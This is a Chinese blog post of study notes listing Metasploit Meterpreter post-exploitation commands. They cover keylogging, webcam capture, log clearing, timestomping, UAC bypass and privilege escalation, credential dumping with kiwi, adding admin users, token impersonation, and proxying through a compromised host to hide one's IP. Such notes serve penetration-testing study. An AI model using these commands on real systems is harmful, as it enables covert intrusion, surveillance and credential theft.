<!DOCTYPE html><html lang="zh-CN" data-theme="light"><head><meta charset="UTF-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no"><title>MSF初体验（二） | Maxenton</title><meta name="author" content="Maxenton"><meta name="copyright" content="Maxenton"><meta name="format-detection" content="telephone=no"><meta name="theme-color" content="#ffffff"><meta name="description" content="MSF初体验（二）学习记录。">
<meta property="og:type" content="article">
<meta property="og:title" content="MSF初体验（二）">
<meta property="og:url" content="https://threeshui.github.io/2022/05/04/MSF%E5%88%9D%E4%BD%93%E9%AA%8C%EF%BC%88%E4%BA%8C%EF%BC%89/index.html">
<meta property="og:site_name" content="Maxenton">
<meta property="og:description" content="MSF初体验（二）学习记录。">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="https://threeshui.github.io/img/MSF01.png">
<meta property="article:published_time" content="2022-05-03T16:00:00.000Z">
<meta property="article:modified_time" content="2022-11-11T11:52:20.537Z">
<meta property="article:author" content="Maxenton">
<meta property="article:tag" content="信息安全">
<meta property="article:tag" content="工具学习">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://threeshui.github.io/img/MSF01.png"><link rel="shortcut icon" href="/img/favicon.png"><link rel="canonical" href="https://threeshui.github.io/2022/05/04/MSF%E5%88%9D%E4%BD%93%E9%AA%8C%EF%BC%88%E4%BA%8C%EF%BC%89/"><link rel="preconnect" href="//cdn.jsdelivr.net"/><link rel="preconnect" href="//hm.baidu.com"/><link rel="preconnect" href="//busuanzi.ibruce.info"/><link rel="stylesheet" href="/css/index.css"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/@fortawesome/fontawesome-free/css/all.min.css" media="print" onload="this.media='all'"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/@fancyapps/ui/dist/fancybox.min.css" media="print" onload="this.media='all'"><script>var _hmt = _hmt || [];
(function() {
  var hm = document.createElement("script");
  hm.src = "https://hm.baidu.com/hm.js?2ec9fa90a95a4d6f2c1057f31b412d4a";
  var s = document.getElementsByTagName("script")[0]; 
  s.parentNode.insertBefore(hm, s);
})();
</script><script>const GLOBAL_CONFIG = { 
  root: '/',
  algolia: undefined,
  localSearch: {"path":"/search.xml","preload":false,"languages":{"hits_empty":"找不到您查询的内容：${query}"}},
  translate: undefined,
  noticeOutdate: undefined,
  highlight: {"plugin":"highlighjs","highlightCopy":true,"highlightLang":true,"highlightHeightLimit":false},
  copy: {
    success: '复制成功',
    error: '复制错误',
    noSupport: '浏览器不支持'
  },
  relativeDate: {
    homepage: false,
    post: false
  },
  runtime: '',
  date_suffix: {
    just: '刚刚',
    min: '分钟前',
    hour: '小时前',
    day: '天前',
    month: '个月前'
  },
  copyright: {"limitCount":50,"languages":{"author":"作者: Maxenton","link":"链接: ","source":"来源: Maxenton","info":"著作权归作者所有。商业转载请联系作者获得授权，非商业转载请注明出处。"}},
  lightbox: 'fancybox',
  Snackbar: undefined,
  source: {
    justifiedGallery: {
      js: 'https://cdn.jsdelivr.net/npm/flickr-justified-gallery/dist/fjGallery.min.js',
      css: 'https://cdn.jsdelivr.net/npm/flickr-justified-gallery/dist/fjGallery.min.css'
    }
  },
  isPhotoFigcaption: false,
  islazyload: false,
  isAnchor: false
}</script><script id="config-diff">var GLOBAL_CONFIG_SITE = {
  title: 'MSF初体验（二）',
  isPost: true,
  isHome: false,
  isHighlightShrink: false,
  isToc: true,
  postUpdate: '2022-11-11 19:52:20'
}</script><noscript><style type="text/css">
  #nav {
    opacity: 1
  }
  .justified-gallery img {
    opacity: 1
  }

  #recent-posts time,
  #post-meta time {
    display: inline !important
  }
</style></noscript><script>(win=>{
    win.saveToLocal = {
      set: function setWithExpiry(key, value, ttl) {
        if (ttl === 0) return
        const now = new Date()
        const expiryDay = ttl * 86400000
        const item = {
          value: value,
          expiry: now.getTime() + expiryDay,
        }
        localStorage.setItem(key, JSON.stringify(item))
      },

      get: function getWithExpiry(key) {
        const itemStr = localStorage.getItem(key)

        if (!itemStr) {
          return undefined
        }
        const item = JSON.parse(itemStr)
        const now = new Date()

        if (now.getTime() > item.expiry) {
          localStorage.removeItem(key)
          return undefined
        }
        return item.value
      }
    }
  
    win.getScript = url => new Promise((resolve, reject) => {
      const script = document.createElement('script')
      script.src = url
      script.async = true
      script.onerror = reject
      script.onload = script.onreadystatechange = function() {
        const loadState = this.readyState
        if (loadState && loadState !== 'loaded' && loadState !== 'complete') return
        script.onload = script.onreadystatechange = null
        resolve()
      }
      document.head.appendChild(script)
    })
  
      const asideStatus = saveToLocal.get('aside-status')
      if (asideStatus !== undefined) {
        if (asideStatus === 'hide') {
          document.documentElement.classList.add('hide-aside')
        } else {
          document.documentElement.classList.remove('hide-aside')
        }
      }
    
    const detectApple = () => {
      if(/iPad|iPhone|iPod|Macintosh/.test(navigator.userAgent)){
        document.documentElement.classList.add('apple')
      }
    }
    detectApple()
    })(window)</script><link rel="stylesheet" href="/css/custom/custom.css"><script src="https://apps.bdimg.com/libs/jquery/2.1.4/jquery.min.js"></script><meta name="generator" content="Hexo 6.3.0"></head><body><div id="sidebar"><div id="menu-mask"></div><div id="sidebar-menus"><div class="avatar-img is-center"><img src="/img/head.jpg" onerror="onerror=null;src='/img/friend_404.gif'" alt="avatar"/></div><div class="sidebar-site-data site-data is-center"><a href="/archives/"><div class="headline">文章</div><div class="length-num">76</div></a><a href="/tags/"><div class="headline">标签</div><div class="length-num">38</div></a><a href="/categories/"><div class="headline">分类</div><div class="length-num">38</div></a></div><hr/><div class="menus_items"><div class="menus_item"><a class="site-page" href="/"><i class="fa-fw fas fa-home"></i><span> 首页</span></a></div><div class="menus_item"><a class="site-page" href="/archives/"><i class="fa-fw fas fa-archive"></i><span> 时间轴</span></a></div><div class="menus_item"><a class="site-page" href="/tags/"><i class="fa-fw fas fa-tags"></i><span> 标签</span></a></div><div class="menus_item"><a class="site-page" href="/categories/"><i class="fa-fw fas fa-folder-open"></i><span> 分类</span></a></div><div class="menus_item"><a class="site-page" href="/about/"><i class="fa-fw fas fa-heart"></i><span> 关于</span></a></div></div></div></div><div class="post" id="body-wrap"><header class="post-bg" id="page-header" style="background-image: url('/img/MSF01.png')"><nav id="nav"><span id="blog_name"><a id="site-name" href="/">Maxenton</a></span><div id="menus"><div id="search-button"><a class="site-page social-icon search"><i class="fas fa-search fa-fw"></i><span> 搜索</span></a></div><div class="menus_items"><div class="menus_item"><a class="site-page" href="/"><i class="fa-fw fas fa-home"></i><span> 首页</span></a></div><div class="menus_item"><a class="site-page" href="/archives/"><i class="fa-fw fas fa-archive"></i><span> 时间轴</span></a></div><div class="menus_item"><a class="site-page" href="/tags/"><i class="fa-fw fas fa-tags"></i><span> 标签</span></a></div><div class="menus_item"><a class="site-page" href="/categories/"><i class="fa-fw fas fa-folder-open"></i><span> 分类</span></a></div><div class="menus_item"><a class="site-page" href="/about/"><i class="fa-fw fas fa-heart"></i><span> 关于</span></a></div></div><div id="toggle-menu"><a class="site-page"><i class="fas fa-bars fa-fw"></i></a></div></div></nav><div id="post-info"><h1 class="post-title">MSF初体验（二）</h1><div id="post-meta"><div class="meta-firstline"><span class="post-meta-date"><i class="far fa-calendar-alt fa-fw post-meta-icon"></i><span class="post-meta-label">发表于</span><time class="post-meta-date-created" datetime="2022-05-03T16:00:00.000Z" title="发表于 2022-05-04 00:00:00">2022-05-04</time><span class="post-meta-separator">|</span><i class="fas fa-history fa-fw post-meta-icon"></i><span class="post-meta-label">更新于</span><time class="post-meta-date-updated" datetime="2022-11-11T11:52:20.537Z" title="更新于 2022-11-11 19:52:20">2022-11-11</time></span><span class="post-meta-categories"><span class="post-meta-separator">|</span><i class="fas fa-inbox fa-fw post-meta-icon"></i><a class="post-meta-categories" href="/categories/%E4%BF%A1%E6%81%AF%E5%AE%89%E5%85%A8/">信息安全</a><i class="fas fa-angle-right post-meta-separator"></i><i class="fas fa-inbox fa-fw post-meta-icon"></i><a class="post-meta-categories" href="/categories/%E4%BF%A1%E6%81%AF%E5%AE%89%E5%85%A8/%E5%B7%A5%E5%85%B7%E5%AD%A6%E4%B9%A0/">工具学习</a></span></div><div class="meta-secondline"><span class="post-meta-separator">|</span><span class="post-meta-wordcount"><i class="far fa-file-word fa-fw post-meta-icon"></i><span class="post-meta-label">字数总计:</span><span class="word-count">1.8k</span><span class="post-meta-separator">|</span><i class="far fa-clock fa-fw post-meta-icon"></i><span class="post-meta-label">阅读时长:</span><span>6分钟</span></span><span class="post-meta-separator">|</span><span class="post-meta-pv-cv" id="" data-flag-title="MSF初体验（二）"><i class="far fa-eye fa-fw post-meta-icon"></i><span class="post-meta-label">阅读量:</span><span id="busuanzi_value_page_pv"><i class="fa-solid fa-spinner fa-spin"></i></span></span></div></div></div></header><main class="layout" id="content-inner"><div id="post"><article class="post-content" id="article-container"><p><img src="https://img-blog.csdnimg.cn/808b62bbb4ca4c579e490db5e5e3cd26.png" alt="在这里插入图片描述"></p>
<p>&#x3D;&#x3D;注意：本篇文章仅用于学习笔记记录与交流，不得用于其他违规用途。&#x3D;&#x3D;</p>
<h1 id="一、Meterpreter简介"><a href="#一、Meterpreter简介" class="headerlink" title="一、Meterpreter简介"></a>一、Meterpreter简介</h1><ul>
<li><p>Meterpreter 比系统 shell 更加灵活，功能更加丰富，例如监控主机，监控键盘，开启摄像头，麦克风，还可</p>
<p>以灵活的获取你的操作系统信息。</p>
</li>
<li><p>高级，动态，可扩展的 payload,一站式后攻击 payload；</p>
</li>
<li><p>基于 meterpreter 上下文利用更多漏洞发起攻击；</p>
</li>
<li><p>后渗透测试阶段一站式操作界面；</p>
</li>
<li><p>完全基于内存的 DLL 注入式 payload（不写硬盘）</p>
</li>
<li><p>注入合法系统进程并建立 stager</p>
</li>
<li><p>基于 stager 上传和预加载 DLL 进行扩展模块的注入(客户端 API)</p>
</li>
<li><p>基于 stager 建立的 socket 连接建立加密的 TLS&#x2F;1.0 通信隧道;</p>
</li>
<li><p>利用 TLS 隧道进一步加载后续扩展模块(避免网络取证</p>
</li>
</ul>
<h1 id="二、Meterpreter基本命令"><a href="#二、Meterpreter基本命令" class="headerlink" title="二、Meterpreter基本命令"></a>二、Meterpreter基本命令</h1><h2 id="1、系统命令"><a href="#1、系统命令" class="headerlink" title="1、系统命令"></a>1、系统命令</h2><h3 id="（1）基本系统命令"><a href="#（1）基本系统命令" class="headerlink" title="（1）基本系统命令"></a>（1）基本系统命令</h3><figure class="highlight powershell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><span class="line">background  <span class="comment">#将当前会话放置后台，然后可以再运行其他模块进行提权</span></span><br><span class="line"></span><br><span class="line">getuid <span class="comment"># 查看权限 </span></span><br><span class="line"></span><br><span class="line">getpid <span class="comment"># 获取当前进程的pid</span></span><br><span class="line"></span><br><span class="line">sysinfo <span class="comment"># 查看目标机系统信息</span></span><br><span class="line"></span><br><span class="line"><span class="built_in">ps</span> <span class="comment"># 查看当前活跃进程    kill &lt;PID值&gt; 杀死进程</span></span><br><span class="line"></span><br><span class="line">idletime <span class="comment">#查看目标机发呆（无操作）时间</span></span><br><span class="line"></span><br><span class="line">reboot / shutdown   <span class="comment">#重启/关机</span></span><br><span class="line"></span><br><span class="line">shell <span class="comment">#进入目标机cmd shell</span></span><br></pre></td></tr></table></figure>

<h3 id="（2）uictl开关键盘-x2F-鼠标"><a href="#（2）uictl开关键盘-x2F-鼠标" class="headerlink" title="（2）uictl开关键盘&#x2F;鼠标"></a>（2）uictl开关键盘&#x2F;鼠标</h3><figure class="highlight powershell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">uictl [<span class="type">enable</span>/<span class="type">disable</span>] [<span class="type">keyboard</span>/<span class="type">mouse</span>/<span class="type">all</span>]  <span class="comment">#开启或禁止键盘/鼠标</span></span><br><span class="line"></span><br><span class="line">uictl disable mouse  <span class="comment">#禁用鼠标</span></span><br><span class="line">uictl disable keyboard  <span class="comment">#禁用键盘</span></span><br></pre></td></tr></table></figure>

<h3 id="（3）webcam摄像头命令"><a href="#（3）webcam摄像头命令" class="headerlink" title="（3）webcam摄像头命令"></a>（3）webcam摄像头命令</h3><figure class="highlight powershell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">webcam_list         <span class="comment">#查看摄像头</span></span><br><span class="line">webcam_snap      <span class="comment">#通过摄像头拍照</span></span><br><span class="line">webcam_stream   <span class="comment">#通过摄像头开启视频</span></span><br></pre></td></tr></table></figure>

<h3 id="（4）执行exe文件"><a href="#（4）执行exe文件" class="headerlink" title="（4）执行exe文件"></a>（4）执行exe文件</h3><figure class="highlight powershell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">execute <span class="operator">-f</span> c:\\<span class="number">111</span>.exe</span><br><span class="line"></span><br><span class="line">execute  <span class="literal">-H</span> <span class="literal">-i</span> <span class="operator">-f</span>  calc.exe</span><br><span class="line"><span class="comment"># execute -H -i -f cmd.exe    # 创建新进程cmd.exe，-H不可见，-i交互</span></span><br></pre></td></tr></table></figure>

<h3 id="（5）migrate进程迁移"><a href="#（5）migrate进程迁移" class="headerlink" title="（5）migrate进程迁移"></a>（5）migrate进程迁移</h3><figure class="highlight powershell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">getpid    <span class="comment"># 获取当前进程的pid</span></span><br><span class="line"><span class="built_in">ps</span>   <span class="comment"># 查看当前活跃进程</span></span><br><span class="line">migrate &lt;pid值&gt;    <span class="comment">#将Meterpreter会话移植到指定pid值进程中，</span></span><br><span class="line"><span class="built_in">kill</span> &lt;pid值&gt;   <span class="comment">#杀死进程</span></span><br></pre></td></tr></table></figure>

<h3 id="（6）clearav清楚日志"><a href="#（6）clearav清楚日志" class="headerlink" title="（6）clearav清楚日志"></a>（6）clearav清楚日志</h3><figure class="highlight powershell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">clearev  <span class="comment">#清除windows中的应用程序日志、系统日志、安全日志，走的时候不要忘记</span></span><br></pre></td></tr></table></figure>

<h2 id="2、文件系统命令"><a href="#2、文件系统命令" class="headerlink" title="2、文件系统命令"></a>2、文件系统命令</h2><h3 id="（1）基础命令"><a href="#（1）基础命令" class="headerlink" title="（1）基础命令"></a>（1）基础命令</h3><figure class="highlight powershell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">getwd 或者<span class="built_in">pwd</span>                         <span class="comment"># 查看当前工作目录  </span></span><br><span class="line"><span class="built_in">ls</span>                                               <span class="comment"># 查看当前路径下的内容</span></span><br><span class="line"><span class="built_in">cd</span>                                              <span class="comment"># 切换目录</span></span><br><span class="line">search <span class="operator">-f</span> *host*                         <span class="comment"># 搜索文件  -h查看帮助</span></span><br><span class="line"><span class="built_in">cat</span> c:\\lltest\\lltestpasswd.txt    <span class="comment"># 查看文件内容</span></span><br><span class="line">edit c:\\<span class="number">1</span>.txt                               <span class="comment">#编辑或创建文件  没有的话，会新建文件</span></span><br><span class="line"><span class="built_in">rm</span> c:\\lltest\\hack.txt                <span class="comment">#删除文件</span></span><br><span class="line">mkdir lltest2                              <span class="comment">#只能在当前目录下创建文件夹</span></span><br><span class="line"><span class="built_in">rmdir</span> lltest2                               <span class="comment">#只能删除当前目录下文件夹</span></span><br></pre></td></tr></table></figure>

<h3 id="（2）上传文件"><a href="#（2）上传文件" class="headerlink" title="（2）上传文件"></a>（2）上传文件</h3><figure class="highlight powershell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">meterpreter &gt; upload //root//daociyiyou.txt c:</span><br><span class="line">[*] uploading  : //root/daociyiyou.txt -&gt; c:</span><br><span class="line">[*] uploaded   : //root/daociyiyou.txt -&gt; c:\daociyiyou.txt</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">meterpreter &gt; upload /tmp/<span class="number">1</span>.txt c:</span><br><span class="line"><span class="comment"># 注意：使用-r参数可以递归上传上传目录和文件</span></span><br></pre></td></tr></table></figure>

<h3 id="（3）下载文件"><a href="#（3）下载文件" class="headerlink" title="（3）下载文件"></a>（3）下载文件</h3><figure class="highlight powershell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">meterpreter &gt; download c:\\<span class="number">1</span>.txt /tmp/</span><br><span class="line">[*] Downloading: c:\hello.txt -&gt; /root/hello.txt</span><br><span class="line">[*] Downloaded <span class="number">1.00</span> B of <span class="number">1.00</span> B (<span class="number">100.0</span>%): c:\hello.txt -&gt; /root/hello.txt</span><br><span class="line">[*] download   : c:\hello.txt -&gt; /root/hello.txt</span><br></pre></td></tr></table></figure>

<h3 id="（4）Timestomp伪造时间戳"><a href="#（4）Timestomp伪造时间戳" class="headerlink" title="（4）Timestomp伪造时间戳"></a>（4）Timestomp伪造时间戳</h3><figure class="highlight powershell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">timestomp C:\\ <span class="literal">-h</span>                            <span class="comment">#查看帮助</span></span><br><span class="line">timestomp <span class="literal">-v</span> C://<span class="number">2</span>.txt                      <span class="comment">#查看时间戳</span></span><br><span class="line">timestomp C://<span class="number">2</span>.txt <span class="operator">-f</span> C://<span class="number">1</span>.txt         <span class="comment">#将1.txt的时间戳复制给2.txt</span></span><br><span class="line"></span><br><span class="line">timestomp  C:\\<span class="number">1</span>.txt  <span class="operator">-f</span> C:\\Users\\Administrator\\Desktop\\test\\<span class="number">1</span>.jpg </span><br><span class="line"></span><br><span class="line">timestomp C:\\passwd.txt <span class="operator">-f</span> C:\\Users\\Administrator\\Desktop\\hj\\nginx<span class="literal">-0</span>.<span class="number">7.65</span>\\nginx.exe</span><br></pre></td></tr></table></figure>

<h2 id="3、网络命令"><a href="#3、网络命令" class="headerlink" title="3、网络命令"></a>3、网络命令</h2><h3 id="（1）基本网络命令"><a href="#（1）基本网络命令" class="headerlink" title="（1）基本网络命令"></a>（1）基本网络命令</h3><figure class="highlight powershell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">ipconfig/ifconfig     <span class="comment"># 查看ip</span></span><br><span class="line">netstat –an           <span class="comment"># 查看开放的端口</span></span><br><span class="line">arp                          <span class="comment"># arp探测</span></span><br><span class="line">getproxy                 <span class="comment">#查看代理信息</span></span><br><span class="line">route                       <span class="comment">#查看路由</span></span><br></pre></td></tr></table></figure>

<h3 id="（2）portfwd端口转发"><a href="#（2）portfwd端口转发" class="headerlink" title="（2）portfwd端口转发"></a>（2）portfwd端口转发</h3><figure class="highlight powershell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">portfwd add <span class="literal">-l</span> <span class="number">6666</span> <span class="literal">-p</span> <span class="number">3389</span> <span class="literal">-r</span> <span class="number">127.0</span>.<span class="number">0.1</span>    <span class="comment">#将目标机的3389端口转发到本地6666端口</span></span><br></pre></td></tr></table></figure>

<h3 id="（3）autoroute添加路由"><a href="#（3）autoroute添加路由" class="headerlink" title="（3）autoroute添加路由"></a>（3）autoroute添加路由</h3><figure class="highlight powershell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">run autoroute <span class="literal">-h</span> <span class="comment">#查看帮助</span></span><br><span class="line">run autoroute <span class="literal">-s</span> <span class="number">192.168</span>.<span class="number">159.0</span>/<span class="number">24</span>  <span class="comment">#添加到目标环境网络，当你相连接一个网络发现不通的时候，可以设置一个路由试试，一般网络中没有设置围栏的情况下，是可以通的</span></span><br><span class="line"></span><br><span class="line">run autoroute <span class="literal">-p</span>  <span class="comment">#查看添加的路由</span></span><br></pre></td></tr></table></figure>

<h3 id="（4）Socks4a代理"><a href="#（4）Socks4a代理" class="headerlink" title="（4）Socks4a代理"></a>（4）Socks4a代理</h3><figure class="highlight powershell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">msf&gt; use auxiliary/server/socks4a </span><br><span class="line">msf &gt; <span class="built_in">set</span> srvhost <span class="number">127.0</span>.<span class="number">0.1</span></span><br><span class="line">msf &gt; <span class="built_in">set</span> srvport <span class="number">1080</span></span><br><span class="line">msf &gt; run</span><br></pre></td></tr></table></figure>
<p>然后<code>vim /etc/proxychains.conf</code> #添加 <code>socks4 127.0.0.1 1080</code>，这样你kali里面所有的软件运行，攻击的手段都</p>
<p>是走的肉鸡的代理，就做到了隐藏自己真是ip的效果了</p>
<p>最后proxychains 使用Socks4a代理访问<br>##		4、提权<br>###		（1）getsystem提权</p>
<figure class="highlight powershell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">getsystem</span><br></pre></td></tr></table></figure>
<p>getsystem工作原理：</p>
<p>①getsystem创建一个新的Windows服务，设置为SYSTEM运行，当它启动时连接到一个命名管道。</p>
<p>②getsystem产生一个进程，它创建一个命名管道并等待来自该服务的连接。</p>
<p>③Windows服务已启动，导致与命名管道建立连接。</p>
<p>④该进程接收连接并调用ImpersonateNamedPipeClient，从而为SYSTEM用户创建模拟令牌。</p>
<p>然后用新收集的SYSTEM模拟令牌产生cmd.exe，并且我们有一个SYSTEM特权进程。<br>###		（2）bypassuac<br>内置多个pypassuac脚本，原理有所不同，使用方法类似，运行后返回一个新的会话，需要再次执行getsystem获取系统权限，如：</p>
<figure class="highlight powershell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">use exploit/windows/local/bypassuac</span><br><span class="line">use exploit/windows/local/bypassuac_injection</span><br><span class="line">use windows/local/bypassuac_vbs</span><br><span class="line">use windows/local/ask</span><br></pre></td></tr></table></figure>
<p>如使用bypassuac.rb脚本：</p>
<figure class="highlight powershell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">msf &gt; use exploit/windows/local/bypassuac</span><br><span class="line">msf &gt; <span class="built_in">set</span> SESSION <span class="number">2</span></span><br><span class="line">msf &gt; run</span><br></pre></td></tr></table></figure>

<h3 id="（3）内核漏洞提权"><a href="#（3）内核漏洞提权" class="headerlink" title="（3）内核漏洞提权"></a>（3）内核漏洞提权</h3><p>可先利用enum_patches模块 收集补丁信息，然后查找可用的exploits进行提权</p>
<figure class="highlight powershell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">meterpreter &gt; run post/windows/gather/enum_patches  <span class="comment">#查看补丁信息</span></span><br><span class="line">msf &gt; use exploit/windows/local/ms13_053_schlamperei</span><br><span class="line">msf &gt; <span class="built_in">set</span> SESSION <span class="number">2</span></span><br><span class="line">msf &gt; exploit</span><br></pre></td></tr></table></figure>

<h2 id="5、kiwi获取密码"><a href="#5、kiwi获取密码" class="headerlink" title="5、kiwi获取密码"></a>5、kiwi获取密码</h2><p>在msf6中mimikatz已经不可以用了，The “mimikatz” extension has been replaced by “kiwi”</p>
<figure class="highlight powershell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">load kiwi          <span class="comment"># help kiwi 查看帮助</span></span><br><span class="line">creds_wdigest  <span class="comment"># 获取账号密码</span></span><br></pre></td></tr></table></figure>

<h2 id="6、远程桌面-amp-截屏"><a href="#6、远程桌面-amp-截屏" class="headerlink" title="6、远程桌面&amp;截屏"></a>6、远程桌面&amp;截屏</h2><figure class="highlight powershell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">enumdesktops     <span class="comment">#查看可用的桌面</span></span><br><span class="line">getdesktop          <span class="comment">#获取当前meterpreter 关联的桌面</span></span><br><span class="line">set_desktop         <span class="comment">#设置meterpreter关联的桌面  -h查看帮助</span></span><br><span class="line">screenshot           <span class="comment">#截屏</span></span><br><span class="line">use espia             <span class="comment">#或者使用espia模块截屏  然后输入screengrab</span></span><br><span class="line">run vnc                <span class="comment">#使用vnc远程桌面连接</span></span><br></pre></td></tr></table></figure>

<h2 id="7、开启RDP-amp-添加用户"><a href="#7、开启RDP-amp-添加用户" class="headerlink" title="7、开启RDP&amp;添加用户"></a>7、开启RDP&amp;添加用户</h2><h3 id="（1）getgui命令"><a href="#（1）getgui命令" class="headerlink" title="（1）getgui命令"></a>（1）getgui命令</h3><figure class="highlight powershell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">run getgui –<span class="built_in">h</span> <span class="comment">#查看帮助</span></span><br><span class="line">run getgui <span class="literal">-e</span> <span class="comment">#开启远程桌面</span></span><br><span class="line">run getgui <span class="literal">-u</span> test2 <span class="literal">-p</span> <span class="number">123456</span>.com   <span class="comment">#添加用户</span></span><br><span class="line">run getgui <span class="operator">-f</span> <span class="number">6661</span>   <span class="comment">#3389端口转发到6661</span></span><br></pre></td></tr></table></figure>
<p>getgui 系统不推荐，推荐使用<code>run post/windows/manage/enable_rdp</code></p>
<p>getgui添加用户时，有时虽然可以成功添加用户，但是没有权限通过远程桌面登陆<br>###		（2）enable_rdp脚本</p>
<figure class="highlight powershell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">run post/windows/manage/enable_rdp  <span class="comment">#开启远程桌面</span></span><br><span class="line"></span><br><span class="line">run post/windows/manage/enable_rdp USERNAME=mhx PASSWORD=<span class="number">123456</span> <span class="comment">#添加用户,默认会添加到管理员组</span></span><br></pre></td></tr></table></figure>

<h2 id="8、键盘记录"><a href="#8、键盘记录" class="headerlink" title="8、键盘记录"></a>8、键盘记录</h2><figure class="highlight powershell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">keyscan_start     <span class="comment">#开始键盘记录</span></span><br><span class="line">keyscan_dump   <span class="comment">#导出记录数据</span></span><br><span class="line">keyscan_stop     <span class="comment">#结束键盘记录</span></span><br></pre></td></tr></table></figure>

<h2 id="9、sniffer抓包"><a href="#9、sniffer抓包" class="headerlink" title="9、sniffer抓包"></a>9、sniffer抓包</h2><figure class="highlight powershell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">use sniffer</span><br><span class="line">sniffer_interfaces       <span class="comment">#查看网卡</span></span><br><span class="line">sniffer_start <span class="number">2</span>            <span class="comment">#选择网卡 开始抓包</span></span><br><span class="line">sniffer_stats <span class="number">2</span>           <span class="comment">#查看状态</span></span><br><span class="line">sniffer_dump <span class="number">2</span> /tmp/lltest.pcap  <span class="comment">#导出pcap数据包</span></span><br><span class="line">sniffer_stop <span class="number">2</span>            <span class="comment">#停止抓包</span></span><br></pre></td></tr></table></figure>

<h2 id="10、令牌操纵"><a href="#10、令牌操纵" class="headerlink" title="10、令牌操纵"></a>10、令牌操纵</h2><p>这个非常有用，比如说我们在一个企业的域控环境里面，我本身是一个普通用户可以通过假冒令牌伪造成管理员用户，然后不需要密码就能登录其他账号了<br>###		（1）incognito假冒令牌</p>
<figure class="highlight powershell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">use incognito      <span class="comment">#help incognito  查看帮助</span></span><br><span class="line">list_tokens <span class="literal">-u</span>    <span class="comment">#查看可用的token</span></span><br><span class="line"></span><br><span class="line">impersonate_token <span class="string">&#x27;NT AUTHORITY\SYSTEM&#x27;</span>  <span class="comment">#假冒SYSTEM token</span></span><br><span class="line">或者impersonate_token NT\ AUTHORITY\\SYSTEM <span class="comment">#不加单引号 需使用\\</span></span><br><span class="line"></span><br><span class="line">或者直接shell</span><br><span class="line">rev2self   <span class="comment">#返回原始token</span></span><br></pre></td></tr></table></figure>

